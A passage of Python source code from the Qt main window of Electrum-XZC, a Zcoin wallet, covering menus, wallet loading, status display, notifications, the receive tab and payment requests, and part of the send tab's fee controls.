self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-XZC Testnet" if constants.net.TESTNET else "Electrum-XZC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Zcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Zcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Zcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
# add_toggle_action(view_menu, self.dip3_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Znodes"), self.show_masternode_dialog)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://zcoin.io"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-XZC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Zcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Zcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-XZC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-XZC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-XZC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
self.masternode_manager.send_subscriptions()
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zcoin address where the payment should be received. Note that each payment request uses a different Zcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Zcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
